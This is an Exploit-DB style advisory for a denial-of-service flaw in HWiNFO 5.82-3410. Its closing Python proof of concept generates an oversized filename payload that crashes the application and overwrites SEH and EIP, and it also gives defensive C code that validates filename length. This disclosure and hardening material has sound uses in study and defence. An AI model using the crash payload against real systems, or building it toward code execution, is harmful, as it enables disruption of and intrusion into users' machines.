Vendor: HWiNFO
By: bzyo
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: HWiNFO
Affected Version From: 5.82-3410
Affected Version To: 5.82-3410
Patch Exists: Yes
Related CWE: N/A
CPE: a:hwinfo:hwinfo
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x86
Year: 2018

HWiNFO 5.82-3410 – Denial of Service

HWiNFO 5.82-3410 is vulnerable to a denial of service attack. An attacker can craft a malicious file containing a large amount of data and supply it to the application; in the PoC below, the file's contents are pasted into the filename field of the Report > Create dialog with the XML export format selected. When the application attempts to process the data, it crashes and the EIP register is overwritten. This can be exploited to execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability.
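
For developers handling a similar filename field, the following added example (not from this page, HWiNFO, or the vendor's patch) shows length and character validation before a copy into a fixed-size buffer. It assumes the crash comes from an unbounded copy of the filename field into a stack buffer; `set_report_filename`, `REPORT_PATH_MAX` and the status codes are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

#define REPORT_PATH_MAX 260   /* Windows MAX_PATH, including the NUL */

enum path_status { PATH_OK = 0, PATH_EMPTY, PATH_TOO_LONG, PATH_BAD_CHAR };

/* Vulnerable shape (assumed, shown for contrast, never called):
 *     char path[REPORT_PATH_MAX];
 *     strcpy(path, user_input);   // no bound: overlong input overruns the
 *                                 // stack buffer and the SEH record above it
 */

/* Hardened: validate length and characters first, copy only on success.
 * dst is left as an empty string on any failure. */
enum path_status set_report_filename(char *dst, size_t dst_size,
                                     const char *user_input)
{
    /* Characters Windows never allows in a path component. */
    static const char forbidden[] = "<>\"|?*";
    size_t len, i;

    if (dst == NULL || dst_size == 0)
        return PATH_TOO_LONG;
    dst[0] = '\0';
    if (user_input == NULL || user_input[0] == '\0')
        return PATH_EMPTY;

    /* Bounded scan: never count past dst_size bytes of input. */
    len = 0;
    while (len < dst_size && user_input[len] != '\0')
        len++;
    if (len >= dst_size)
        return PATH_TOO_LONG;       /* reject, do not truncate silently */

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)user_input[i];
        if (c < 0x20 || strchr(forbidden, c) != NULL)
            return PATH_BAD_CHAR;
    }
    memcpy(dst, user_input, len + 1);   /* len + 1 <= dst_size */
    return PATH_OK;
}
```

A 9,999-character input, the size the PoC script on this page generates, is rejected with `PATH_TOO_LONG` and the destination buffer is left empty.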

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: HWiNFO 5.82-3410 - Denial of Service
# Date: 05-04-18
# Vulnerable Software: HWiNFO 5.82-3410
# Vendor Homepage: https://www.hwinfo.com/
# Version: 5.82-3410
# Software Link: https://www.hwinfo.com/files/hwi_582.exe
# Tested On: Windows 7 x86
#
# PoC: 
# 1. generate hwinfo.txt, copy contents to clipboard
# 2. open app, select Report, Create
# 3. choose Export format XML
# 4. paste hwinfo.txt contents into filename field
# 5. select Next, Next
#
# app crashes & EIP overwrite;
# !mona seh > only ppr, non-safeseh module contains startnull
# 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE)
#

filename="hwinfo.txt"
#offset 530
junk = "A"*526

seh = "B"*4

nseh = "C"*4

fill = "D"*9465

buffer = junk + seh + nseh + fill

with open(filename, 'w') as textfile:
    textfile.write(buffer)